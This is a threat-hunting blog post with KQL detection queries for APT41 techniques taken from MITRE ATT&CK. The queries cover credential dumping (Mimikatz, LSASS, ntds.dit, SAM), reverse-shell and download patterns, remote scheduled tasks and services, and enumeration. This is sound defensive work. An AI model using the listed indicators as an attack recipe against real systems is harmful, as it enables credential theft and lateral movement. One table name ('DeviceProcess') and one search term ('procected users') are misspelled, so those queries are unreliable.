Hunting APT41 TTPs
Introduction
To directly quote MITRE ATT&CK — “APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.”
In this post, I will go through the references on the APT41 MITRE page and showcase hunting opportunities.
Also, just as a quick note for how I write hunts. You will see “FileName” filters commented out by default; this is to account for renamed binaries. If needed, one can uncomment these lines to increase the efficiency of the search.
Standard caveats apply:
- Absence of evidence is not evidence of absence — just because you don’t see anything does not mean they are not there
- Evidence of activity is not evidence of actor — these are widely used TTPs, not unique to APT41
- I performed no attribution; I relied on existing references in MITRE ATT&CK
PowerShell
// PowerShell Downloads, DCSync
DeviceProcessEvents
// | where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("WebClient",
"DownloadFile",
"Invoke-DCSync",
"-PWDumpFormat")
or
(ProcessCommandLine contains "Net.Sockets.TCPClient"
and ProcessCommandLine contains "GetStream"
and ProcessCommandLine contains "Invoke-Expression")
LOLBAS Downloads
// BITSAdmin or CertUtil Downloads
DeviceProcessEvents
| where ProcessCommandLine has_any ("bitsadmin", "certutil")
| where ProcessCommandLine has_any ("http", "https")
Lateral Movement & Persistence
// Creating scheduled tasks on remote hosts
DeviceProcessEvents
// | where FileName =~ "schtasks.exe"
| where ProcessCommandLine contains " /create "
| where ProcessCommandLine contains " /s " // Remote host
| where ProcessCommandLine contains " /tr "
// Creating a service on a remote host
DeviceProcess
// | where FileName =~ "sc.exe"
| where ProcessCommandLine contains @"\\"
| where ProcessCommandLine has "create"
| where ProcessCommandLine contains "binPath"
// WMIC Remote Process Creation
DeviceProcessEvents
// | where FileName =~ "wmic.exe"
| where ProcessCommandLine has "process call create"
| where ProcessCommandLine contains "/node:"
// One time scheduled task run
DeviceProcessEvents
// | where FileName =~ "schtasks.exe"
| where ProcessCommandLine has " once "
| where ProcessCommandLine contains " /create "
| where ProcessCommandLine contains " /tr "
Credential Access
// NTDSUtil dumping ntds.dit
DeviceProcessEvents
// | where FileName =~ "ntdsutil.exe"
| where ProcessCommandLine has_any ("activate instance ntds", "ac i ntds")
| where ProcessCommandLine has "create full"
// reg utility to save SAM
DeviceProcessEvents
// | where FileName =~ "reg.exe"
| where ProcessCommandLine has_all ("save", "hklm", "sam")
// ProcDump LSASS or Mimikatz
DeviceProcessEvents
| where ProcessCommandLine has_any ("-accepteula", "lsass.dmp")
or ProcessCommandLine contains "sekurlsa"
or ProcessCommandLine contains "privilege::debug"
// Generic LSASS Dump File
DeviceFileEvents
| where FileName =~ "lsass.dmp"
Enumeration
// Searching for passwords
DeviceProcessEvents
| where ProcessCommandLine has_all ("findstr", "password")
// Various enumeration tasks
DeviceProcessEvents
// | where FileName in~ ("net.exe", "net1.exe")
| where ProcessCommandLine has_any ("localgroup administrators",
"domain admins",
"domain controllers",
"schema admins",
"procected users",
"enterprise admins",
"exchange domain servers",
"systeminfo",
"whoami")
// ping sweep
DeviceProcessEvents
| where ProcessCommandLine has "ping"
| where ProcessCommandLine has " for "
| where ProcessCommandLine has " do "
| where ProcessCommandLine contains "255"
// vssadmin modify shadows, copy ntds.dit or evtx
DeviceProcessEvents
| where (ProcessCommandLine has "vssadmin"
and ProcessCommandLine has_any ("shadow", "shadows"))
or
ProcessCommandLine has_all ("esentutl", "ntds.dit")
or
ProcessCommandLine has_all ("copy", ".evtx")
// DsQuery invocations
DeviceProcessEvents
// | where FileName =~ "dsquery.exe"
| where ProcessCommandLine has_all (" -filter ", " -attr ")
References
Google — This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits
Google — Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments
CrowdStrike — 2020 Global Threat Report